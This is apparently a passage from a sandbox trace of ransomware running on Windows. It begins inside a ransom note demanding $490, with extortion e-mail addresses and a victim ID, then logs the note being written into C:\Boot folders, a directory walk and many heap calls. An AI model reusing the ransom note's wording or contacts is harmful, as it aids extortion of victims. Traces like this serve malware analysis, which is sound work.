$490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" [0228.680] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\_readme.txt" (normalized: "c:\\boot\\pt-pt\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.680] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3467538 | out: hHeap=0x620000) returned 1 [0228.680] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b818 | out: hHeap=0x620000) returned 1 [0228.680] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.680] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-PT\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.681] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79140 | out: hHeap=0x620000) returned 1 [0228.681] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.681] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0228.681] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0228.681] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.681] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.681] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd540 | out: hHeap=0x620000) returned 1 [0228.681] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.681] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.681] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.681] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.681] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.681] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.681] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.681] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.681] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.681] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.681] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.681] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.681] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.681] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.681] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.681] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.682] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.682] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.682] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.682] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.682] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.682] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.682] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.682] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.682] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.682] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.682] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.682] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0228.682] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.682] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.682] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.682] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.682] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.682] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.682] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.682] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.682] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.682] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.682] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.682] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.682] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.682] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.682] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.682] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.682] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.683] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.683] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.683] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.683] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.683] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.683] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.683] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.683] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.683] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.683] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.683] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.683] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.684] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.684] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.684] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.684] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.684] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.684] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.684] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.684] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.684] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.684] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.684] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.684] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.684] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.684] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.684] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0228.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.686] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.686] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.686] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.686] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.686] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.686] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.686] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.686] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.686] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.686] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.686] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.686] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.686] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.686] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.686] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.686] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.686] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.686] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.686] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.686] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.686] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.686] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.686] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.686] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.686] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.686] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.686] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.687] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.687] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.687] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.687] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.687] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.687] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.687] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.687] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.687] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.687] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.687] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.687] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.687] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.687] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.687] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.687] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.687] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.687] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.687] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.687] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.687] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.687] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.687] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.687] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.687] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.687] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.687] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.687] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.687] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.687] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.688] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.688] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.688] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.688] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.688] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.688] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.688] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.688] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.688] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.688] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.688] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.688] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.688] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.688] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.688] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.688] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.688] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.688] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.688] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.688] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.688] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.688] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.688] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.688] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.688] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.688] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.688] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.688] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.688] HeapFree (in: hHeap=0x620000, dwFlags=0x0, 